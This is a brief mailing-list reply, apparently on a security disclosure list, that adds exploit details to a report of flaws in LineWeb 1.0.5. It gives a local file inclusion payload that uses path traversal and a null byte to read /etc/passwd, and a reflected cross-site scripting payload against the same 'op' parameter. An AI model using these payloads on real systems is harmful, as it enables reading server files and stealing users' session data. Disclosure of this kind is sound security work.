[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Multiple vulnerabilities in LineWeb 1.0.5



One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00 

And ?op is vulnerable to a xss attack, IE:
index.php?op=<script>alert(document.cookie)</script>

Ignacio.